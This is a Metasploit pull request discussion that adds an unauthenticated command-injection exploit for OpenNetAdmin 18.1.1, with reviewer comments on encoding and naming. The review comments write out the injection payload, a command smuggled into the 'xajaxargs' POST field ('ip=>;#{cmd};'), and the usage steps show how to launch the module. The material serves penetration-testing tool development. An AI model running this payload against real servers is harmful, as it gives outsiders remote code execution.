Add OpenNetAdmin 18.1.1 Remote Code Execution exploit #12704
Conversation
OpenNetAdmin provides a database managed inventory of your IP network. Each subnet, host, and IP can be tracked via a centralized AJAX enabled web interface that can help reduce tracking errors. This module exploits a command injection in OpenNetAdmin.
Added OpenNetAdmin 18.1.1 Exploit Documentation
| end | ||
|
|
||
| def filter_bad_chars(cmd) | ||
| cmd.gsub!(/chmod \+x/, 'chmod 777') |
There was a problem hiding this comment.
Would this make more sense as:
| cmd.gsub!(/chmod \+x/, 'chmod 777') | |
| CGI.escape cmd |
to catch all the characters?
There was a problem hiding this comment.
Is there a reason to use data rather than vars_post (which would automatically take care of URL encoding) ?
There was a problem hiding this comment.
vars_post = {
'xajax' => 'window_submit',
'xajaxargs[]' => 'tooltips',
'xajaxargs[]' => 'ip%3D%3E;#{filter_bad_chars(cmd)};',
'xajaxargs[]' => 'ping'
}
warning: key "xajaxargs[]" is duplicated and overwritten
I am encountering the above error.
@bcoles
There was a problem hiding this comment.
Unfortunately I don't see a way to handle the repeated key query string paradigm in Rex (PHP will turn it into an array). I'm fine passing as a string (with the payload properly encoded), or you can add array handling to https://github.com/rapid7/metasploit-framework/blob/master/lib/rex/proto/http/client_request.rb#L138-L146. Instead of doing a val.to_s right away, when val is an array I would do something like:
val.each do |v|
v = v.to_s
pstr << '&' if pstr.length > 0
pstr << (opts['encode_params'] ? set_encode_uri(var) : var)
pstr << '='
pstr << (opts['encode_params'] ? set_encode_uri(v) : v)
endThen you could pass the post data like:
vars_post = {
'xajax' => 'window_submit',
'xajaxargs[]' => ['tooltips', 'ip=>;#{cmd};', 'ping']
}
|
There's inconsistency with the naming convention here.
It looks like OpenNetAdmin is a typical LAMP stack style application, which should run on any UNIX system. In which case the module belongs in |
Co-Authored-By: acammack-r7 <adam_cammack@rapid7.com>
documentation/modules/exploit/linux/http/opennetadmin_ping_cmd_injection.md
Outdated
Show resolved
Hide resolved
documentation/modules/exploit/linux/http/opennetadmin_ping_cmd_injection.md
Outdated
Show resolved
Hide resolved
… to modules/exploits/unix/webapp/opennetadmin_ping_cmd_injection.rb
…in_ping_cmd_injection.md to documentation/modules/exploit/unix/webapp/opennetadmin_ping_cmd_injection.md
handle the repeated key query rapid7#12704 (comment)
Handle the repeated key query string rapid7#12704 (comment)
documentation/modules/exploit/unix/webapp/opennetadmin_ping_cmd_injection.md
Outdated
Show resolved
Hide resolved
modules/exploits/unix/webapp/opennetadmin_ping_cmd_injection.rb
Outdated
Show resolved
Hide resolved
modules/exploits/unix/webapp/opennetadmin_ping_cmd_injection.rb
Outdated
Show resolved
Hide resolved
cdelafuente-r7
changed the title
…d_injection.md Co-Authored-By: cdelafuente-r7 <56716719+cdelafuente-r7@users.noreply.github.com>
Co-Authored-By: cdelafuente-r7 <56716719+cdelafuente-r7@users.noreply.github.com>
|
@onurer, thanks again for this contribution! I just pushed a last commit to fix an indentation issue. Not a big deal. |
Release NotesThis module allow you to exploit a command injection vulnerability in OpenNetAdmin 18.1.1, a network management application for managing IP subnets, and remotely execute commands. You don’t need to authenticate to exploit this vulnerability. |
OpenNetAdmin provides a database managed inventory of your IP network. Each subnet, host, and IP can be tracked via a centralized AJAX enabled web interface that can help reduce tracking errors.
This module exploits a command injection in OpenNetAdmin.
Verification
Launch metasploit and set the appropiate options:
msfconsoleuse exploit/linux/http/opennetadmin_ping_cmd_injectionset RHOSTS <rhosts>set LHOST <lhost>set VHOST <hostname>exploit